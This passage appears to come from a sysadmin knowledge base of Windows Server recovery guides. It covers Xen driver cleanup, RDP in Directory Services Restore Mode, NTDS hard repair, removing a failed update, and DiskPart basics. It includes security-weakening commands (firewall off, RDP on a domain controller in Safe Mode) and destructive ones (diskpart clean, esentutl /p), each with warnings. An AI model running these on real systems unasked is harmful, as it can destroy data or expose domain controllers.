Verify each: dir xenvbd.sys dir xenbus.sys dir xendisk.sys They must appear without .disabled or .bad . 8. Disable Non-Essential Xen Drivers (Common Crash Sources) The following drivers frequently cause early boot crashes or silent reboots and can safely be disabled during recovery: Driver Purpose Action During Recovery xencrsh.sys Crash handler (can suppress BSOD and reboot instead) Disable xeniface.sys Interface driver Disable xennet.sys Xen network driver Disable xenvif.sys Virtual interface driver Disable xenfilt.sys Filter driver Disable xencons.sys Console / communication driver Disable xensvc.sys (if present) Xen service Disable xen.sys Legacy Xen stub driver Disable Disable the above by renaming them. Example: ren xencrsh.sys xencrsh.sys.disabled ren xeniface.sys xeniface.sys.disabled ren xennet.sys xennet.sys.disabled ren xenvif.sys xenvif.sys.disabled ren xenfilt.sys xenfilt.sys.disabled ren xencons.sys xencons.sys.disabled ren xen.sys xen.sys.disabled (If a file does not exist, Windows will report that the file cannot be found. This is safe; move on to the next line.) Verify which drivers are disabled: dir *.disabled dir *.bad 9. Repair the Bootloader (EFI & BCD) After cleaning up drivers, rebuild the EFI boot configuration. 9.1 Mount the EFI System Partition diskpart list vol Locate the small FAT32 volume (~100 MB). This is usually the EFI System Partition. select vol assign letter=S exit 9.2 Rebuild EFI Boot Files with BCDBOOT bcdboot C:\Windows /s S: /f UEFI Expected output: Boot files successfully created. 10. Force VM to Show BSOD (Optional but Useful) If the VM was previously rebooting without any BSOD, it can be useful to disable automatic recovery so the stop code is visible. bcdedit /store C:\boot\bcd /set {default} recoveryenabled No bcdedit /store C:\boot\bcd /set {default} bootstatuspolicy ignoreallfailures After this, a failing boot should display an actual Blue Screen with a STOP code instead of silently rebooting. 11. Adjusting VM Virtualization Mode (HVM vs PVHVM) Windows can also fail with INACCESSIBLE_BOOT_DEVICE if the VM’s virtualization mode conflicts with the installed drivers. 11.1 Using XCP-ng CLI to Force HVM Mode SSH into the XCP-ng host. List the VM: xe vm-list name-label=MSLS-DC01_COPY Copy the VM’s UUID . Force BIOS/HVM boot and clear PV bootloader: xe vm-param-set uuid= HVM-boot-policy="BIOS order" xe vm-param-set uuid= PV-bootloader="" This makes the VM boot like a standard hardware virtual machine using generic Microsoft disk drivers, bypassing some PV boot dependencies. 12. Reboot and Test Detach the Windows ISO from the VM. Reboot the VM normally. Observe behavior: If Windows boots successfully, proceed to reinstall XCP-ng Guest Tools. If a BSOD still appears, note the exact STOP code and driver name (if shown). 13. Reinstall XCP-ng Guest Tools (After Successful Boot) Open Xen Orchestra or XCP-ng Center. Select the VM and choose Install Guest Tools . Inside the guest OS, open the mounted tools ISO and run setup.exe . Follow the wizard to install or repair guest tools. Reboot the VM and confirm it boots cleanly with PV drivers loaded. 14. If INACCESSIBLE_BOOT_DEVICE Persists If the VM still stops with INACCESSIBLE_BOOT_DEVICE after driver cleanup, EFI rebuild, and HVM mode testing, additional steps may be required: Restore registry hives from C:\Windows\System32\config\RegBack . Perform an in-place OS repair/upgrade using the Windows setup (keep files and settings). Restore the VM from a known-good snapshot or backup. These steps are scenario-specific and should be documented once a final working solution for this particular VM is determined. 15. Document Status Status: In progress — VM still presenting INACCESSIBLE_BOOT_DEVICE during some tests. Completed: Filesystem checks, DISM/SFC, Xen driver isolation, crash handler disablement, EFI/BCD rebuild. Next actions: Finalize working combination of: Driver set (which Xen drivers remain enabled), and VM virtualization mode (HVM vs PVHVM) Once stable, append the final resolution steps, root cause summary, and preventive recommendations for future Windows Server deployments on XCP-ng. Enabling RDP in Directory Services Restore Mode (DSRM) This procedure allows you to remote into a Domain Controller while it is booted into Directory Services Restore Mode (DSRM) using RDP. This is not officially supported by Microsoft and should be used only for recovery and troubleshooting. ⚠️ Important Use this only on isolated or lab systems, or during controlled recovery windows. RDP in DSRM temporarily changes Safe Mode behavior and weakens security. Always remove these changes once recovery activities are complete. 1. Prerequisites Server is a Domain Controller running Windows Server (2016+ recommended). You can log on locally (console or hypervisor console) as a local Administrator / DSRM Administrator. You know the DSRM password for the server. DSRM Logon Format When using RDP in DSRM, you must log on as: .\Administrator (local account) using the DSRM password , not the domain password. 2. Boot the Domain Controller into DSRM On the DC, run: bcdedit /set safeboot dsrepair Reboot the server. The DC will start in Directory Services Restore Mode (Safe Mode). Log on using the DSRM Administrator credentials. Tip After you are done with recovery work, remember to remove SafeBoot: bcdedit /deletevalue safeboot 3. Enable the RDP Service in Safe Mode By default, the Remote Desktop Services (TermService) service does not start in Safe Mode / DSRM. We add a SafeBoot registry entry to allow it. Open an elevated Command Prompt or PowerShell window. Run the following command to allow TermService in Safe Mode with Networking: REG ADD "HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\TermService" /VE /T REG_SZ /D "Service" /F Start the Remote Desktop service: net start TermService Note If you see an error that dependencies are not running, complete the networking steps below and then re-run net start TermService . 4. Enable Networking in DSRM DSRM typically starts with minimal or no networking. To allow RDP, we must enable some core network services. Add the MSIServer entry under SafeBoot (helps some services start correctly): REG ADD "HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\MSIServer" /VE /T REG_SZ /D "Service" /F Start key networking services (run what is applicable; some may already be running or may not exist on all builds): net start msiserver net start nlasvc net start dhcp net start dnscache Start Remote Desktop Services again (if needed): net start TermService Verification Confirm that RDP is listening on TCP 3389: netstat -ano | findstr 3389 If you see a LISTENING entry on port 3389, the RDP listener is active. 5. Allow RDP Through the Firewall Group Policy is not processed normally in DSRM, so we explicitly open the RDP firewall rule set. Enable the built-in Remote Desktop firewall group: netsh advfirewall firewall set rule group="remote desktop" new enable=Yes (Optional) For lab or emergency use, you may temporarily disable the firewall entirely: netsh advfirewall set allprofiles state off Security Warning Do not leave the firewall disabled longer than necessary. Re-enable it or restore normal security once recovery is complete. 6. Connect via RDP in DSRM From an admin workstation, open Remote Desktop Connection (mstsc). Connect to the server using its IP address or hostname. When prompted for credentials, use: Username: .\Administrator Password: the DSRM password (set when the DC was promoted). You should now have a full RDP session into the server while it is in Directory Services Restore Mode , allowing you to run tools like NTDSUTIL , copy recovery files, and perform other repair tasks more comfortably. 7. Cleanup After Recovery Once you have finished your AD repair or recovery work and are ready to return the DC to normal operation, perform the following cleanup. 7.1 Remove Safe Mode / DSRM Boot From an elevated command prompt: bcdedit /deletevalue safeboot Reboot the server into normal mode. 7.2 Remove the SafeBoot TermService Override Open an elevated command prompt. Delete the TermService SafeBoot entry: REG DELETE "HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\TermService" /F 7.3 Restore Normal Firewall Settings If you disabled the firewall, re-enable it: netsh advfirewall set allprofiles state on Validate that only the expected firewall rules are enabled for RDP and other services. ✅ Summary By adding TermService and MSIServer to the SafeBoot configuration, starting a minimal set of networking services, and enabling the RDP firewall rules, you can securely RDP into a Domain Controller while it is in DSRM. Remember to remove these changes once recovery is complete to return the server to its standard, hardened state. Directory Services Cannot Start After Restoring NTDS & SYSVOL on a Single DC Fixing STOP Code 0xC00002E2 This guide explains how to recover from the Windows Server Blue Screen: STOP CODE: 0xC00002E2 STATUS_DS_INIT_FAILURE This typically occurs when: ntds.dit was restored manually SYSVOL was restored manually BurFlags may have been set The server was freshly promoted as a new DC The NTDS database state does not match the system registry metadata On a single domain controller , this issue is fully recoverable using an NTDS hard repair. ⚠️ Requirements This procedure is safe ONLY when: You have a single Domain Controller (no other DCs in the domain) There is no AD replication to other servers If you have more than one DC, stop here — this procedure can cause USN rollback in multi-DC environments. 1. Boot into Directory Services Restore Mode (DSRM) Restart the domain controller. During system startup, press F8 (or use your hypervisor / cloud console “Send F8” function). Select: Directory Services Restore Mode Log in using the DSRM password (set when the DC was promoted). 2. Perform a Hard Repair of NTDS.dit Open Command Prompt (Administrator) while in DSRM and run: esentutl /p "C:\Windows\NTDS\ntds.dit" You will be prompted: Proceed with repair (Y/N)? Type: Y This performs a “hard repair” of the AD database. This is only safe because this is a single DC domain. 3. Run an Integrity Check Still in DSRM, run: esentutl /g "C:\Windows\NTDS\ntds.dit" Expected output should end with something similar to: Integrity check successful If errors appear, stop and record the output before proceeding. 4. (Optional but Recommended) Defragment the Database Defragmenting the database can reclaim space and further clean up after the repair: esentutl /d "C:\Windows\NTDS\ntds.dit" Wait for the operation to complete before continuing. 5. Clean Up NTDS Log Files Navigate to the NTDS folder: C:\Windows\NTDS Delete only the following file types: *.log *.jrs edb.chk Do NOT delete: ntds.dit temp.edb any other *.dit files any *.jfm files Removing the log and checkpoint files ensures AD does not try to reuse invalid transaction logs after the repair. 6. Reboot the Server Normally Restart the server in normal mode: shutdown /r /t 0 Expected outcome: The server boots normally (no more STOP 0xC00002E2) The Active Directory Domain Services service starts You can log in normally with a domain account 7. Verify SYSVOL and NETLOGON Shares After logging in, open Command Prompt and run: net share You should see entries for: SYSVOL NETLOGON If those shares exist, SYSVOL is being published correctly. 8. Re-Initialize SYSVOL (FRS) Authoritatively If you manually restored SYSVOL content, you should re-initialize FRS so that this DC treats its SYSVOL as authoritative. Set the BurFlags value: reg add "HKLM\SYSTEM\CurrentControlSet\Services\NtFrs\Parameters\Backup/Restore\Process at Startup" /v BurFlags /t REG_DWORD /d 0xD4 /f Then restart the File Replication Service: net stop ntfrs net start ntfrs FRS will now rebuild its replication state using the restored SYSVOL as the authoritative source. 9. Validate Domain Health Run a domain controller diagnostic: dcdiag /v Review the output for: Netlogon-related errors SYSVOL or FRS errors General AD DS health issues If there are issues you are unsure about, you can paste the relevant sections into ChatGPT for analysis. Final Result When all steps are complete, you should have: A domain controller that boots without STOP 0xC00002E2 A repaired and consistent ntds.dit database SYSVOL correctly restored and shared FRS synchronized to the restored SYSVOL (BurFlags D4) Active Directory fully operational in a single-DC environment You can now proceed with normal operations and, if desired, plan for adding additional domain controllers, proper backups, and disaster recovery procedures to avoid similar issues in the future. Fix Windows Server Boot Failure After Windows Update This guide walks through recovering a Windows Server system that fails to boot after a Windows Update. It uses Windows Recovery Environment (WinRE) and DISM to revert or remove problematic updates. Tested with Windows Server 2019. The process is nearly identical for Server 2016 / 2022. Prerequisites Windows Server installation ISO matching your OS version Physical console, iDRAC, iLO, or other remote KVM access Administrator credentials BitLocker recovery key (if BitLocker is enabled) Step 1 — Boot into Windows Recovery Environment Download the correct Windows Server ISO from Microsoft. Search: "Windows Server 2019 Evaluation ISO" Boot the server using: Bootable USB Virtual Media via iDRAC / iLO At the installer screen: Click Next Select Repair your computer Navigate to: Troubleshoot → Advanced Options → Command Prompt If Windows already entered automatic recovery after multiple failed boots, you may see this menu without external media. Step 2 — Unlock BitLocker (If Enabled) If the system drive is encrypted, unlock it first: manage-bde -status manage-bde -unlock D: -RecoveryPassword YOUR-KEY-HERE Replace drive letter and recovery key as needed. Step 3 — Identify the Windows Installation Drive In recovery mode, drive letters change. The OS drive is often NOT C:. diskpart list volume exit Note the volume containing the Windows folder. dir C: dir D: dir E: Example: Windows located on D:\ Step 4 — Check Disk Integrity (Recommended) Before touching updates, verify filesystem health: chkdsk D: /f Replace D: with your OS drive. Step 5 — Revert Pending Updates This cancels unfinished update operations. dism /image:D:\ /cleanup-image /revertpendingactions This may take several minutes. When complete: Close Command Prompt Click Continue → Boot to Windows If Windows boots successfully, stop here. Step 6 — Remove a Fully Installed Broken Update If Windows crashes after login or loops during boot, the update must be manually removed. List Installed Packages dism /image:D:\ /get-packages Recent updates appear near the bottom. Remove a Package dism /image:D:\ /remove-package /packagename:PACKAGE_NAME Tip: Highlight package → right-click to copy → right-click to paste. Remove updates one at a time and reboot between attempts. Step 7 — Repair Boot Configuration (If System Still Won’t Start) If the system fails before Windows loads, repair the bootloader: bootrec /fixmbr bootrec /fixboot bootrec /scanos bootrec /rebuildbcd If /fixboot returns Access Denied: bootsect /nt60 sys Step 8 — Run System File Check Offline Scan for corrupted Windows files: sfc /scannow /offbootdir=D:\ /offwindir=D:\Windows Step 9 — Final Reboot Exit Command Prompt Remove installation media Reboot normally Troubleshooting Notes If DISM fails: verify correct drive letter If drive is read-only: run diskpart → attributes disk clear readonly If BitLocker relocks: unlock again If updates reinstall automatically: pause Windows Update after recovery Summary Boot to recovery Unlock BitLocker Locate OS drive Check disk health Revert pending updates Remove broken packages Repair bootloader if needed Run SFC This procedure resolves most Windows Update boot failures without reinstalling the operating system. DiskPart Tutorial — Windows Disk & Volume Management DiskPart is a low-level command-line tool used to manage disks, partitions, and volumes. It is commonly used in recovery environments, server troubleshooting, and OS deployment. ⚠ Warning: DiskPart can permanently destroy data. Always confirm disk numbers before making changes. When to Use DiskPart Windows won’t boot Disk or volume not visible Partition repair or cleanup Formatting drives Preparing disks for OS install Checking RAID / NVMe detection Launching DiskPart diskpart You’ll see: DISKPART> Basic Navigation Commands List all disks list disk Shows all physical disks detected by the system. Select a disk select disk 0 Replace 0 with the correct disk number. View disk details detail disk Working with Volumes List volumes list volume Displays partitions and drive letters. Select a volume select volume 2 View volume details detail volume Assign or Change Drive Letter assign letter=D Useful when Windows Recovery doesn’t mount drives correctly. Rescan Storage Devices rescan Forces DiskPart to re-detect disks. Useful after loading drivers. Clear Read-Only Disk State attributes disk clear readonly Fixes disks stuck in read-only mode. Create New Partition (Dangerous) ⚠ Erases existing partition layout. clean create partition primary format fs=ntfs quick assign Only use when preparing a disk for fresh installation. Repair Scenario — Disk Visible but No Volume Run list disk Select disk Run detail disk Run rescan Check volumes again If volumes still missing, partition table may be corrupted. Stop and switch to recovery tools. Exit DiskPart exit Common Mistakes to Avoid Running clean on wrong disk Formatting system disk accidentally Assuming disk numbers are same as BIOS Ignoring read-only attributes Writing new partitions before recovery attempt Recovery Best Practice Always document disk numbers first Never modify disk until data is backed up Use read-only inspection before repair If unsure — stop and escalate Summary DiskPart is powerful and dangerous Use it for inspection first, repair second Always confirm disk identity Never rush destructive commands DiskPart is a surgical tool — treat it like one. Disk vs Volume — Understanding Windows Storage Before using DiskPart, it is critical to understand the difference between a disk and a volume. Most recovery mistakes happen because these concepts are confused. What Is a Disk? A disk is a physical or virtual storage device. It is the entire container of storage capacity. Examples of disks: Physical hard drive (HDD) Solid State Drive (SSD / NVMe) RAID virtual disk VM virtual disk (VMDK / VHDX) SAN storage LUN Windows labels disks numerically: Disk 0 Disk 1 Disk 2 A disk has no usable filesystem until it is partitioned. It is raw storage. What Is a Volume? A volume is a formatted section of a disk. It is the usable storage space that Windows can read and write. Volumes: Have a filesystem (NTFS, ReFS, FAT32) Can receive a drive letter Contain files and folders Host the Windows operating system Users interact with volumes, not disks. Disk Structure Example A single disk may contain multiple partitions and volumes: Disk Partition Volume Purpose Disk 0 EFI System (hidden) Bootloader Disk 0 Microsoft Reserved (hidden) System use Disk 0 Main NTFS C: Windows OS Disk 0 Data NTFS D: User files Disk = entire drive Volumes = usable sections inside the drive Why This Matters in Recovery Drive letters change in recovery mode Windows may not mount volumes automatically You must identify the OS volume manually DiskPart shows the real storage structure Viewing Disks with DiskPart diskpart list disk Shows all physical disks detected by the system. Viewing Volumes list volume Displays all mounted volumes and their drive letters. Key Concept Summary A disk is the entire storage device A volume is a formatted section of that disk One disk can contain multiple volumes Windows operates on volumes, not raw disks Recovery requires locating the correct volume Important Warning ⚠ Commands like clean erase entire disks. They do not erase just a volume — they destroy the disk’s partition table. Always confirm disk identity before destructive actions. Mental Model Disk = entire pizza Volumes = slices of pizza You can’t eat the whole disk at once. You eat slices (volumes).